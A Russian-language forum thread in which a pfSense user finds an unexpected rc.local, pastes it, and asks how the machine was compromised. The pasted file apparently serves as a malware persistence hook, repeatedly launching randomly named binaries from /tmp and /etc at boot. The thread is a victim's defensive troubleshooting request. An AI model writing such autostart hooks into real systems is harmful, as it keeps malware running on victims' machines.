Появился rc.local с какими-то подозрительными ко
-
Доброго времени суток.
Сегодня pf неожиданно начал выдавать сообщения о невозможности найти файлы, которых там быть не должно.
Гугл показал, что нужно посмотреть rc.local, там было:#!/bin/sh -e # # rc.local # # This script is executed at the end of each multiuser runlevel. # Make sure that the script will "exit 0" on success or any other # value on error. # # In order to enable or disable this script just change the execution # bits. # # By default this script does nothing. exit 0cd /tmp;./sfewfesfs cd /tmp;./gfhjrtfyhuf cd /tmp;./rewgtf3er4t cd /tmp;./fdsfsfvff cd /tmp;./smarvtd cd /tmp;./whitptabil cd /tmp;./gdmorpen cd /etc;./sfewfesfs cd /etc;./gfhjrtfyhuf cd /etc;./rewgtf3er4t cd /etc;./fdsfsfvff cd /etc;./smarvtd cd /etc;./whitptabil cd /etc;./gdmorpen cd /tmp;./sfewfesfs cd /tmp;./gfhjrtfyhuf cd /tmp;./rewgtf3er4t cd /tmp;./fdsfsfvff cd /tmp;./smarvtd cd /tmp;./whitptabil cd /tmp;./gdmorpen cd /etc;./sfewfesfs cd /etc;./gfhjrtfyhuf cd /etc;./rewgtf3er4t cd /etc;./fdsfsfvff cd /etc;./smarvtd cd /etc;./whitptabil cd /etc;./gdmorpen cd /etc;./sfewfesfs cd /etc;./gfhjrtfyhuf cd /etc;./rewgtf3er4t cd /etc;./fdsfsfvff cd /etc;./smarvtd cd /etc;./whitptabil cd /etc;./gdmorpen cd /tmp;./sfewfesfs cd /tmp;./gfhjrtfyhuf cd /tmp;./rewgtf3er4t cd /tmp;./fdsfsfvff cd /tmp;./smarvtd cd /tmp;./whitptabil cd /tmp;./gdmorpen cd /tmp;./sfewfesfs cd /tmp;./gfhjrtfyhuf cd /tmp;./rewgtf3er4t cd /tmp;./fdsfsfvff cd /tmp;./smarvtd cd /tmp;./whitptabil cd /tmp;./gdmorpen cd /etc;./sfewfesfs cd /etc;./gfhjrtfyhuf cd /etc;./rewgtf3er4t cd /etc;./fdsfsfvff cd /etc;./smarvtd cd /etc;./whitptabil cd /etc;./gdmorpen
Посмотрел на другом pf, там rc.local не было в принципе, удалил его и перестало выдавать сообщение об ошибке.
Как понимаю где-то я поймал вирус/руткит, но где и как не понимаю.
Подскажите пожалуйста, куда смотреть? -
Во freebsd не может быть rc.local. Потому что не может быть никогда.
Сегодня pf неожиданно начал выдавать сообщения о невозможности найти файлы, которых там быть не должно.
Покажите эти логи.
Как понимаю где-то я поймал вирус/руткит, но где и как не понимаю.
Оч. бы хотелось на него посмотреть.
-
Ошибка появлялась в главном меню консолиhttp://s017.radikal.ru/i412/1412/15/e87ae98b287c.jpg
У гугла спрашивал именно по тому, что было на экране.
Не нашел в каком из логов смотреть, тк после удаления rc.local перезагружал, большинство логов чистые=(
В system.log ничего кроме того, что постоянно с непонятных внешних IP пытаются подключиться…
Подскажите пожалуйста какие еще логи посмотреть